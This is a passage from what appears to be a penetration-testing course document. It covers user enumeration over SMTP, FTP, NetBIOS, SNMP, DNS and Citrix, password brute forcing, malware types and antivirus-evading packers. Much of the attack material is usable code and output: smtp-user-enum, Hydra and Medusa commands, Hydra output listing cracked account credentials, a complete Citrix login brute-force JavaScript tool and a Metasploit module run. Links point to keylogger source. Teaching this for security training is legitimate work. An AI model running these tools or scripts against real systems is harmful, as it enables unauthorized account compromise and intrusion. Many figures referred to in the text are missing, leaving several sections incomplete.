o Might trigger a false alarm of a “SYN Flood” attack in *Firewalls/*IDS/*IPS

48 | P a g e
Enumeration Overview of System Hacking Cycle
Enumerating the allowed HTTP Methods on a Web Server:

49 | P a g e
Enumerating Usernames Using Google
Exposed Configuration Files

50 | P a g e
Company Email Addresses:
In most cases, a user’s email address is also his username inside the company, especially when
Single Sign-On (SSO) is implemented.

51 | P a g e
SMTP Enumeration (VRFY, EXPN, RCPT TO, NDR)
Using the SMTP VRFY Command
It is possible to enumerate the existing users and email aliases using the official SMTP VRFY
request. It is possible to automate the process with a simple script/tool such as: “smtp-user-
enum.pl”.
The output below shows how the SMTP server responds differently to VRFY requests for valid and
invalid users. It is recommended that a manual check like the following is carried out before running
smtp-user-enum. Obviously the tool won't work if the server doesn't respond differently to requests
for valid and invalid users.
$ telnet 10.0.0.1 25
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
VRFY no_such
550 no_such... User unknown
VRFY root
250 Super-User <root@myhost>
To use smtp-user-enum to enumerate valid usernames using the VRFY command, first
prepare a list of usernames (users.txt) and run the tool as follows:
$ smtp-user-enum.pl -M VRFY -U users.txt -t 10.0.0.1
Starting smtp-user-enum v1.0 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... users.txt
Target count ............. 1
Username count ........... 47
Target TCP port .......... 25
Query timeout ............ 5 secs
Relay Server ............. Not used

52 | P a g e
######## Scan started at Sun Jan 21 18:01:50 2011 #########
root@10.0.0.1: Exists
bin@10.0.0.1: Exists
daemon@10.0.0.1: Exists
lp@10.0.0.1: Exists
adm@10.0.0.1: Exists
uucp@10.0.0.1: Exists
postmaster@10.0.0.1: Exists
nobody@10.0.0.1: Exists
ftp@10.0.0.1: Exists
######## Scan completed at Sun Jan 21 18:01:50 2011 #########
9 results.
47 queries in 1 seconds (47.0 queries / sec)
It's worth noting that postmaster is not actually a valid OS-level user account - it's a mail
alias.
Using the SMTP EXPN Command
The output below shows how the SMTP server responds differently to EXPN requests for
valid and invalid users.
$ telnet 10.0.0.1 25
Trying 10.0.0.1...
HELO
HELO x
EXPN no_such
EXPN root
250 Super-User <root@myhost>
To use smtp-user-enum to enumerate valid usernames using the VRFY command, first
prepare a list of usernames (users.txt) and run the tool as follows (unsurprisingly, we get
the same results as above):
$ smtp-user-enum.pl -M EXPN -U users.txt -t 10.0.0.1
Starting smtp-user-enum v1.0 ( http://pentestmonkey.net/tools/smtp-user-enum )

53 | P a g e
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... EXPN
Worker Processes ......... 5
Usernames file ........... users.txt
Target count ............. 1
Username count ........... 47
Target TCP port .......... 25
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started at Sun Jan 21 18:01:50 2011 #########
root@10.0.0.1: Exists
bin@10.0.0.1: Exists
daemon@10.0.0.1: Exists
lp@10.0.0.1: Exists
adm@10.0.0.1: Exists
uucp@10.0.0.1: Exists
postmaster@10.0.0.1: Exists
nobody@10.0.0.1: Exists
ftp@10.0.0.1: Exists
######## Scan completed at Sun Jan 21 18:01:50 2011 #########
9 results.
47 queries in 1 seconds (47.0 queries / sec)
Using the SMTP RCPT TO Command
The output below shows how the SMTP server responds differently to RCPT TO requests
for valid and invalid users. This is often to the most useful technique as VRFY and EXPN
are often disabled to prevent username enumeration.
$ telnet 10.0.0.1 25
Trying 10.0.0.1...
HELO
HELO x
MAIL FROM:root
250 root... Sender ok

54 | P a g e
RCPT TO: no_such
RCPT TO:root
250 root... Recipient ok
Non Delivery Response (NDR)
Mail servers are friendly and attempt to provide users with the best service they can.
Therefore, when someone sends an email to a non-existing user, the mail server notifies
him that this user doesn’t exist, so he can correct his type error or call that person to get
his new account name.
To enumerate usernames using NDR, the attacker just sends an email to an account on a
certain domain, if the account exists the attacker gets no notification, if it doesn’t exist,
you will get a NDR email, saying this account doesn’t exist.
POP3 Enumeration
The Post Office Protocol (POP3) is used by users to read their emails. In order for a user
to get his mailbox contents, the server requires the user to identify in two sequential
steps. The first step the user sends the keyword “USER” followed by a space and his
username. At the second step the user sends the keyword “PASS” followed by a space
and his password in clear-text.

55 | P a g e
Some POP3 servers were implemented in such a way that they reply with different error
messages when the user exists and a different one when he doesn’t. Let's select a
random list of names and passwords, connect to POP3 server with a telnet client of your
choice, and try to authenticate. Following is an example of a POP3 server listening on an
AS/400 machine:

56 | P a g e
Private User Directories
Apache User Enumeration
http://www.example.com/~<username>
When a remote user makes a request for a possible user's default home page, the
server returns one of three responses:
• In a case where username is a valid user account, and has been configured with a
homepage, the server responds with the user's homepage.
• When username exists on the system, but has not been assigned a homepage
document, the server returns the message "You don't have permission to access
/~username on this server."
• If the tested username does not exist as an account on the system, the Apache
server's response includes the message "The requested URL /~username was not
found on this server." or refers to the default error page configured for this error.
For Example:
When the user doesn’t exit, it redirects to the website main page:
WordPress Authors Template User Enumeration Vulnerability
There are other places where you might be able to find some usernames. A good
example is WordPress author templates which allow you to extract usernames through
URLs with the following syntax: /wordpress/author/authorname/
i.e.:

57 | P a g e
http://www.target-domain.com/wordpress/author/admin/
http://www.target-domain.com/wordpress/author/root/
A case when the user doesn’t exist:
A case when the user exists:

58 | P a g e
FTP
CWD Username Enumeration Vulnerability (Example: Solaris in.ftpd)
The Sun Solaris operating systems contains a built-in ftp server called “in.ftpd”. This FTP
server has classic user enumeration vulnerability. When a user is logged on to the
server, even with anonymous access, he can call the command CWD (Current Working
Directory) followed by a username.
The server will reply a different response if the user account exists and a different one if
it doesn’t. For Example:
“CWD ~root”
FTP Server Authentication Delay Username Enumeration Vulnerability
(Example: ProFTPD)
A timing attack exists in ProFTPD that could assist a remote user in enumerating
usernames. The analysis of the response time during authentication gives an attacker
indication as to whether or not the supplied username is valid.
The problem occurs due to altering execution paths when the daemon encounters a
valid, invalid or privileged username. A remote attacker can exploit this vulnerability to
determine what usernames are valid, privileged, or do not exist on the remote system.
When authentication attempt is sent to the FTP server, it will respond slowly if the
username exists and faster if it doesn’t.
Telnet
Telnet Server User Field Account Enumeration (Example: Cisco Aironet)
A flaw was discovered in the firmware of Cisco Aironet AP1100 Valid version 12.2. The
flaw allows a malicious remote user to discover which accounts are valid on the targeted
Cisco Aironet Access Point by submitting a user name as the first parameter.
If the account exists the attacker will be then prompted for the password.
If not, the server will reply with the message: ""% Login invalid", revealing the account
doesn’t exist.
Web Server Pre-Login – HTTP Response based enumeration (Example:
Lotus Domini)

59 | P a g e
An issue was reported in Lotus Domino server (“Lotus Domino Username Enumeration
Vulnerability”), which could allow for remote users to determine the validity of a
username existing on a host.
When a remote user submits a GET request for a possible user's account, the server
response assists the user in determining the validity of the username submitted. If the
submitted username is valid, the server replies with an HTTP 200 OK message and the
login screen.
Alternatively, when the submitted username is not valid (meaning that it does not exist
on the system), the server responds with a 404 File not Found message. Because the
server responds differently depending on whether or not the username is valid, an
attacker user can test and enumerate possible usernames.
Error Message User Enumeration:
Most systems developed in the last decade are web applications. Most of these application
require a user login mechanism which is being developed by the companies themselves. As
secure development is not taught in Universities in the common Computer Science and
Software Engineering degrees, most developers, make the same common mistakes when
developing login mechanism.
The most common mistakes are the application replying different error messages when the user
account exists and a different when it doesn’t. For Example:
• System Registration Error Message User Enumeration
o Sorry, there is already an account registered with the same email address.
• System Login Error Message User Enumeration
o Authentication failure: entered username does not exist.
o Authentication failure: incorrect password entered.
• System “Forget Password” Error/Success Message User Enumeration
o Sorry, the email address entered does not exist.
o A new password has been sent to your email address.
NetBIOS User Enumeration
The LSA (Local Security Authority) server on every Windows machine is the service which
handles the user login and determines the access levels each user gets to the system objects
when he connects to system services such as RPC, WMI, Remote Desktop and NetBIOS.

60 | P a g e
In every Windows Server 2003 and prior, This “RestrictAnonymous” setting is configured by
default to allow unauthenticated users to retrieve information regarding any/all local/domain
users (RestrictAnonymous=0). This setting allows an attacker to connect to the server using no
username and password.
For Example by using: ‘cmd /c net use domain_server /user:”” “”’ or by using the common
NetBIOS user enumeration tool written by SecurityFriday, “GetAcct”:
It is also possible to use the tool Winfingerprint and obtain information from all common
services exposed by a local server on the network:

61 | P a g e
Mcafee FoundStone SuperScan 4:

62 | P a g e
NetBIOS Enumerator

63 | P a g e
GFI Languard
SNMP Enumeration
It is possible to obtain the system information about the remote host by sending SNMP requests
with a remotely existing “OID” (Object ID) such as 1.3.6.1.2.1.1.1. An attacker may use this
information to gain more knowledge about the target host.
An attacker is able to remotely discover the machines usernames, IPs connected to the machine,
MAC addresses, internal IPs, gateways, DNS servers (which can be used for fast DNS in order to
take over the internal network). The attacker also knows the exact model and firmware version
to this machine and can use it to create reliable exploit.
An Example of a remote SNMP Enumeration:

64 | P a g e
DNS Enumeration
A penetration test project beings in collecting information and mapping all the remotely
accessible organization’s servers. The Domain Name Server can be used to extract some
of the existing subdomains and discover more IPs, with different server types, from Web
Servers to Firewalls, VPNs and Citrix Servers.
The DNS sub domains can be enumerated by using a dictionary of common sub domain
names such as “mail”, “webmail”, “vpn”, “backoffice”, “fw” and etc…
In order to find customized sub domain names, an attacker must run a full remote brute
force attack and is likely to disclose all subdomains names from 1 to 8 characters length
with letters and numbers. Since the DNS protocols is UDP based, the brute force attack
faster than most other network brute force attack.

65 | P a g e
Dictionary Based DNS Enumeration
Brute Forcing DNS Sub-Domains

66 | P a g e
VoIP User Enumeration
Most currently deployed VoIP servers are using SIP (Session Initiation Protocol) server
implementations, which are very similar to HTTP. In order to authenticate using the SIP
protocol, the remote user must specify the extension name to log into. Then the user is
required to submit his username and password, where in most cases the extension
number is also the username.
Several VoIP systems start the first extension number from 100 and set the default
password of all extensions to the extension number. This means that for some VoIP
servers, the default user names and passwords will be 100:100, 101:101 and etc…
Enumerating Extensions:
Enumerate Usernames: (Example: Inter Asterisk Exchange protocol)

67 | P a g e
Citrix Published Applications Remote Enumeration
It is possible to use several tools such as:
http://packetstormsecurity.org/defcon10/dc10-vitek/citrix-pa-scan.c
http://packetstormsecurity.org/defcon10/dc10-vitek/citrix-pa-proxy.pl
The Citrix Application Enumeration script can be used as follows:
#. /citrix-pa-scan 212.123.69.1
Citrix Published Application Scanner version 1.0 By Ian Vitek, ian.vitek@ixsecurity.com
212.123.69.1: Found Applications:
Printer Config
Admin Desktop
i-desktop
It is also possible to use Nmap or MetaSploit to enumerate the applications published by a Citrix
Server:
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##

68 | P a g e
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/gather/citrix_published_bruteforce
msf auxiliary(citrix_published_bruteforce) > set RHOST [TARGET IP]
msf auxiliary(citrix_published_bruteforce) > run
Once found, an application can be manually added to the local ICA client:

69 | P a g e
System Hacking Part 1- Cracking Password
Brute Forcing Passwords – Telnet:
Cracking Accounts Using Hydra
Using the tool Hydra by THC (The Hacker’s Choice), it is possible to remotely and reliably crack
accounts of almost every commonly used system.
Hydra supports cracking accounts in all the following protocols: imap, imap-ntlm, smb smbnt,
http/https-{head|get|post|post-form}, http-proxy, cisco (telnet), cisco-enable (telnet), vnc,
ldap2, ldap3, mssql, mysql, oracle-listener, postgres, nntp, socks5, rexec, rlogin, pcnfs, snmp,
rsh, cvs, svn, icq, sapr3, ssh2, smtp-auth, smtp-auth-ntlm, pcanywhere, teamspeak, sip, vmauthd
hydra.exe -L "usernames.txt" -P "passwords.txt" -e ns -o cracked_smbs.txt
<any_domain_connected_machine> smb
Example:
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-11-07 17:16:06
[DATA] 1 tasks, 1 servers, 4652972 login tries (l: 11026/p: 422), ~4652972 tries per task
[DATA] attacking service smb on port 139

70 | P a g e
[STATUS] 8332.00 tries/min, 8332 tries in 00:01h, 4644640 to do in 09:18h
[139][smb] host: 10.205.200.206 login: PRAVNER password: 12345
[139][smb] host: 10.205.200.206 login: ZORIK password: 12345
[139][smb] host: 10.205.200.206 login: COHSIGAL password: 123456
[139][smb] host: 10.205.200.206 login: INADRIAN password: 123456
[139][smb] host: 10.205.200.206 login: Guest password: Guest
[139][smb] host: 10.205.200.206 login: MLSHOSHANA password: 12345
[139][smb] host: 10.205.200.206 login: MEETING_ROOM password: 12345
[139][smb] host: 10.205.200.206 login: SHIL password: 22222
[139][smb] host: 10.205.200.206 login: NTRFAX password: NTRFAX
[139][smb] host: 10.205.200.206 login: EZORLY password: 22222
[139][smb] host: 10.205.200.206 login: anonymous password: anonymous
[139][smb] host: 10.205.200.206 login: INFO password: 12345
[139][smb] host: 10.205.200.206 login: NTJERPDC password: NTJERPDC
[139][smb] host: 10.205.200.206 login: GRMINA password: 123456
[139][smb] host: 10.205.200.206 login: BRSHUKI password: 123456
[139][smb] host: 10.205.200.206 login: KZADINA password: 123456
[139][smb] host: 10.205.200.206 login: SPOFER password: 123456
[139][smb] host: 10.205.200.206 login: ALROZE password: 123456
[139][smb] host: 10.205.200.206 login: CHYULI password: 12345
Cracking Accounts Using Medusa:
Medusa is very much like Hydra, it supports the following protocols: AFP, CVS, FTP,
HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL,
REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN),
Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic Wrapper, Web Form
Here is an example of usage and results:
% medusa -h 192.168.0.20 -u administrator -P passwords.txt -e ns -M smbnt
Medusa v1.0-rc1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: (1/7)

71 | P a g e
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: administrator (2/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: password (3/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass1 (4/7)
Brute Forcing Check Point Client Authentication Remote Service
The Check Point web Client Authentication Remote Service is just a simple HTML based
authentication form, easily attacked with a common web brute force tool such as Hydra,
Medusa, Crowbar and etc…
The login page was displayed at the enumeration section. The result of a successful login
attempt into a default user in Check Point Firewall looks like this:
Brute Forcing Citrix ICA Servers

72 | P a g e
The hacker pdp from GNUCITIZEN.org wrote a Citrix Brute Force tool (I guess this was the first
public one and for now seems to be the only) which uses the “Citrix.ICAClient” COM Object to
manipulate the local Citrix client to make the login attacks. The code is a local JavaScript code
running under “Windows Script Host”.
var actns = [];
var pairs = [];
var parms = {};
var util = this;
var usernames = [];
var passwords = [];
var timeout = 5000;
if (WScript.Arguments.length < 3) {
WScript.Echo('usage: ' + WScript.ScriptName + ' key=value key=value key=value ...');
WScript.Echo(' ' + WScript.ScriptName + ' TCPBrowserAddress=172.16.3.191 usernames=user1,user2 passwords=pass1,pass2');
WScript.Echo(' ' + WScript.ScriptName + ' HTTPBrowserAddress=172.16.3.191 userfile=file.txt passfile=file.txt');
WScript.Echo(' ' + WScript.ScriptName + ' TCPBrowserAddress=172.16.3.191 usernames=user1,user2 passwords=pass1,pass2 timeout=5000');
WScript.Echo('');
WScript.Echo('CITRIX Login Bruteforce Utility');
WScript.Echo('by Petko D. Petkov (pdp) GNUCITIZEN (http://www.gnucitizen.org)');
WScript.Quit(1);
}
var try_out = WScript.CreateObject('Citrix.ICAClient');
for (var i = 0; i < WScript.Arguments.length; i++) {
var arg = WScript.Arguments(i);
var tkn = arg.split('=');
try {
var name = tkn[0].replace(/^s+|s+$/g, '');
var value = tkn[1].replace(/^s+|s+$/g, '');
switch (name) {
case 'timeout':
try {
timeout = int(value);
} catch (e) {

73 | P a g e
WScript.Echo("option 'timeout' must be an integer value");
}
break;
case 'usernames':
var items = value.split(',');
for (var z = 0; z < items.length; z++) {
usernames.push(items[z].replace(/^s+|s+$/g, ''));
}
break;
case 'passwords':
var items = value.split(',');
for (var z = 0; z < items.length; z++) {
passwords.push(items[z].replace(/^s+|s+$/g, ''));
}
break;
case 'userfile':
try {
var fso = WScript.CreateObject('Scripting.FileSystemObject');
var f = fso.OpenTextFile(value, 1);
while (!f.AtEndOfStream) {
var line = f.ReadLine();
usernames.push(line.replace(/^s+|s+$/g, ''));
}
f.Close();
} catch (e) {
WScript.Echo(e.message);
WScript.Quit(1);
}
break;
case 'passfile':
try {
var fso = WScript.CreateObject('Scripting.FileSystemObject');
var f = fso.OpenTextFile(value, 1);
while (!f.AtEndOfStream) {
var line = f.ReadLine();
passwords.push(line.replace(/^s+|s+$/g, ''));
}
f.Close();
} catch (e) {
WScript.Echo(e.message);
WScript.Quit(1);
}
break;
default:
try_out.SetProp(name, value);
parms[name] = value;

74 | P a g e
}
} catch (e) {
WScript.Echo("option '" + arg + "' not recognized");
WScript.Quit(1);
}
}
}
function frap(f) {
var a = [];
for (var i = 1; i < arguments.length; i++) {
a.push(arguments[i]);
}
return function () {
f.apply(f, a);
};
}
for (var i = 0; i < usernames.length; i++) {
for (var z = 0; z < passwords.length; z++) {
pairs.push([usernames[i], passwords[z]]);
}
}
for (var i = 0; i < pairs.length; i++) {
actns.push(frap(function (i) {
util['_cls' + i] = WScript.CreateObject('Citrix.ICAClient', '_ica' + i);
util['_ica' + i + 'OnLogon'] = frap(function (i) {
WScript.Echo(pairs[i]);
util['_cls' + i].Disconnect();
}, i);
for (var z in parms) {
util['_cls' + i].setProp(z, parms[z]);
}
util['_cls' + i].setProp('UserName', pairs[i][0]);
util['_cls' + i].setProp('Password', pairs[i][1]);
util['_cls' + i].setProp('Launch', 'TRUE');
util['_cls' + i].Connect();
actns.push(frap(function (i) {
util['_cls' + i].Disconnect();
}, i));
}, i));
}
while(1) {
var action = actns.pop();
if (action) {
action();
} else {
WScript.Quit(0);

75 | P a g e
}
WScript.Sleep(timeout);
}
pdp also wrote a script to use Citrix legitimately, after a user and a password were obtained:
var client = WScript.CreateObject('Citrix.ICAClient');
if (WScript.Arguments.length == 0) {
WScript.Echo('usage: ' + WScript.ScriptName + ' key=value key=value key=value ...');
WScript.Echo(' ' + WScript.ScriptName + ' TCPBrowserAddress=172.16.3.191 Application=Notepad');
WScript.Echo('');
WScript.Echo('CITRIX Client Utility');
WScript.Echo('by Petko D. Petkov (pdp) GNUCITIZEN (http://www.gnucitizen.org)');
WScript.Quit(1);
} else {
for (var i = 0; i < WScript.Arguments.length; i++) {
var arg = WScript.Arguments(i);
var tkn = arg.split('=');
try {
var name = tkn[0].replace(/^s+|s+$/g, '');
var value = tkn[1].replace(/^s+|s+$/g, '');
client[name] = value;
} catch (e) {
WScript.Echo("option '" + arg + "' not recognized");
WScript.Quit(1);
}
}
}
try {
client.Launch = "TRUE";
client.Connect();
} catch (e) {
WScript.Echo(e);
}

76 | P a g e
Trojans and Backdoors Effect on Business
In this section we will cover the most common malware in the world, what it does, how it works
and how it affects the world’s computer industry and the economy. The types of malware to be
covered:
 Dialers
 FraudWare
 Keyloggers
 Spyware & Browser Trojans
 Trojans
 Password Stealers
 RansomWare
 Network Shares/Local Replicating Viruses
 Worms
The following is according to a research made by the Ponemon Institute:
We see that cybercrime damage had costs 45 companies about 52 billion dollars in every year.
Here we can see that 80% of attacks result in a Trojan, Backdoor, Worm or Virus being installed.

77 | P a g e
Auto Dialers
 Mutes the modem’s speaker
 Automatically calling 1-900 numbers on your behalf
 You are being charged between $1 to $20 or more per minute.
 At the end of the month it usually ends with a sum greater than 5000$
 Anti-Viruses don’t supply a generic way to stop these viruses, we do not let any software
create and dial connections.
FraudWare
 A fake “Anti-Spyware” or “Anti-Virus” product
 Has a GUI, looks the same as a genuine AV
 Installs some applications on your computer to scare you, for example a red desktop
background with pirate skull and a popup with “Virus Found, pay to purchase license
and remove it”
 Known signatures by AVs treat is as “Not.a.virus.fraudware” and do nothing

78 | P a g e
 It may self-update to a real unknown virus
Keylogger
 Divides to 2 types:
▪ User mode
▪ SetWindowHooksEx
▪ GetAsyncKeyState
▪ Code Example: http://www.rootkit.com/newsread.php?newsid=346
▪ Uncaught Example: Keylogger Running Under Kaspersky 2009
▪ Kernel Mode
▪ A smart driver sitting as low as physically contacting your keyboard
▪ Most of them are undetectable and once ran, can shut down and delete
any Anti-Virus
▪ Code Example:
http://www.woodmann.com/forum/attachment.php?attachmentid=10
84&d=1093991813

79 | P a g e
▪ 99% uncaught
 How can we differentiate between a Keylogger and a computer game?
Spyware & Browser Trojans
 Integrates itself to your browser
 Tracks browsing/buying preferences
 Steals account passwords
 Bypasses firewalls as it is injecting “image requests” into active user initiated
connections to “safe websites“
 Caught based on signatures and URL blacklists which are modified every day
Trojans
 Integrates itself into your system to stealthily run on each boot
 Opens a shell or connects back to the attacker for a live session or to retrieve
“commands”
 Some are integrated with a password stealer and a Keylogger
 A famous Trojan is: “SubSeven”
 Easy to write, hard to “detect” as it does the same actions legitimate software does (e.g
Skype)
Password Stealers
 Most run once and “suicides”, others may Integrate itself into
your system to stealthily run on each boot
 Some also have an integrated Keylogger

80 | P a g e
 Steal passwords saved by clients and typed into clients at runtime. (e.g. dialup, email, IE,
MSN, YMSN, ICQ/AOL, Oracle, FTP passwords)
 A famous Russian Password Stealer: “Pinch!”
 Easy to write, almost impossible to detect as malicious, “it just reads local non-
document files and a few non-system registry entries”, “perhaps it’s a password
manager?”)
RansomWare
RansomWare typically propagates as a conventional computer worm, entering a system
through, for example, vulnerability in a network service or an e-mail attachment. It may then:
 Disable an essential system service or lock the display at system startup.
 Encrypt some of the user's personal files. Encrypting RansomWare was
originally referred to as crypto-viruses, crypto-Trojans or crypto-worms.
In both cases, the malware may extort by:
 Prompting the user to enter a code obtainable only after wiring payment to the attacker
or sending an SMS message and accruing a charge.
 Urging the user to buy a decryption or removal tool.
More sophisticated RansomWare may hybrid-encrypt the victim's plaintext with a
random symmetric key and a fixed public key. The malware author is the only party that knows
the needed private decryption key. The author who carries out this crypto-viral extortion attack
offers to recover the symmetric key for a fee.
 A famous example: “Gpcode”, an RSA 1024BIT encryption, Kaspersky Anti-Virus labs
requested help from the community in order to reach 15 million computers, running for
about a year, to crack one variant’s key
 How can such software be detected?! This is an everlasting logical vulnerability. It just
reads local files and deletes local files. The Anti-Virus model does not cover file deletion
or file reading…

82 | P a g e
Viruses and Worms Virus History
Viruses and Worms are the living diseases of computers. They are the only type of software
which actually breeds itself and can even mutate completely automatically. There is no doubt
that some of the largest damages of all time made to economy were due to worms breakouts.
Looking at the research done by the Ponemon Institute clearly proves the point.
Local Replicating Viruses
 These are the old fashioned “DOS days”, well known “viruses” which infect all the
applications in the system in order to spread and survive Anti-Virus removal attempts
 Since Windows 95, these viruses also replicate themselves into Writable Network Shares
and to restricted ones using the logged on user credentials
 This virus model was almost instinct until 2004 where it was combined with spreading
through P2P file sharing by
 The famous “W32/Netsky.c@MM” replicated itself into the KaZaA” shared folder with
attractive names such as “Microsoft WinXP Crack.exe“

83 | P a g e
 As the virus industry is now financially motivated, latest Trojans infect non-built-in
startup applications to load on boot without changing the system configuration or files,
only the applications whose integrity is not verified.
Worms
 The term defines a virus with non-local, wide-spread virus propagation techniques
 Began in Windows 95 with Microsoft Office “Macros” (famous Melissa) until 2002
where macros were disabled by default with its cousin, the “Mass-Mailing”
(famous “I Love You”) worms which are still at the top
 The new generation started in 2003 with “W32.Blaster” followed by “W32.Sasser” and
many others
 These are the really money making and industry shaping viruses who conquers the
world in less than a week
 Today since there are Firewalls, these worms are spread in combination with browser
and email client infections in order to penetrate networks and use 0-Day exploits such
as the unbelievable MS08-067
Antivirus
Anti-Virus is software installed on a computer endpoint or a computer network content gateway
(Web, Email…). Its purpose is detecting and removing different malicious code from the viruses
and worms family up to Trojans and key-loggers.
Anti-Viruses have three main operation methods:
1. Signature Based (Black-List) – inspecting any accessed content and comparing strings
and code sequences from the disk and the computer’s memory against a preinstalled
signature database.
2. Heuristic Based (Patterns) – Inspecting the behavior of software in order to find patterns
similar to those of known general/generic malicious code. The inspection usually follows
focuses on:
a) Sequence of calls to different operating system functions
b) Creating file types with incorrect file extensions in unconventional paths

84 | P a g e
c) Applications permissions request such as accessing the memory space of other
applications
d) Writing into/over a large amount of enclosed/pre-compiled files such as executable
files.
3. Sandbox – Running applications “In Space“, in a closed environment where it is possible
to inspect all that the application is about to do, without it actually being able to harm
the machine or make any changes to it.
Packers/Crypters – Bypassing Anti-Viruses
Executable compression is any means of compressing an executable file and combining the
compressed data with decompression code into a single executable. When this compressed
executable is executed, the decompression code recreates the original code from the
compressed code before executing it. In most cases this happens transparently so the
compressed executable can be used in the exact same way as the original.
A compressed executable can be considered a self-extracting archive, where compressed data is
packaged along with the relevant decompression code in an executable file. Some compressed
executable can be decompressed to reconstruct the original executable without directly
executing it.
Originally executable compression was created in order to optimize the size on the disk
executable files, especially for the download of setup installations via the internet. Later on,
packing was used by software vendors in order to protect their software from reverse
engineering, therefore protecting patents, trade secrets and preventing the cracking of the
licensing mechanism.
Today executable compressors, aka “Packers” are used mostly by hackers and virus writers in
order to bypass antiviruses and pass known (black-listed) malware through them. There are
several types of packers/Crypters which are in common use:
1. Executable Compressor
a) UPX
2. Traditional Executable Packer
a) ASPack (Stolen API Bytes)
b) ASProtect
c) Stealth EXE Protector
3. Memory Protector (User Mode)
a) Silicon Realms Armadillo (CopyMem II, Debug blocker, Nanomites)
b) PESpin (Debug blocker)

85 | P a g e
4. Memory Protector (Kernel Mode)
a) Extreme Protector
b) Obsidium
5. Virtual Machine (With a virtual processor different CPU])
a) TheMida
b) VMProtect
c) MoleBox
6. Almost Unfeasibly bypass-able
a) StarForce FrontLine ProActive
Netcat - Original – Less Then Packed
Bypassing Antivirus – Netcat * MEW

88 | P a g e
Netcat * RDG PolyPack v1.1

89 | P a g e
Poison Ivy
SCPack 1.1

91 | P a g e
Alternate EXE Packer

92 | P a g e
Alternate EXE Packer

Hacker techniques, exploit and incident handling

Hacker techniques, exploit and incident handling

Recommended

Recommended

More Related Content

What's hot

What's hot (18)

Viewers also liked

Viewers also liked (6)

Similar to Hacker techniques, exploit and incident handling

Similar to Hacker techniques, exploit and incident handling (20)

More from Rafel Ivgi

More from Rafel Ivgi (14)

Recently uploaded

Recently uploaded (20)

Hacker techniques, exploit and incident handling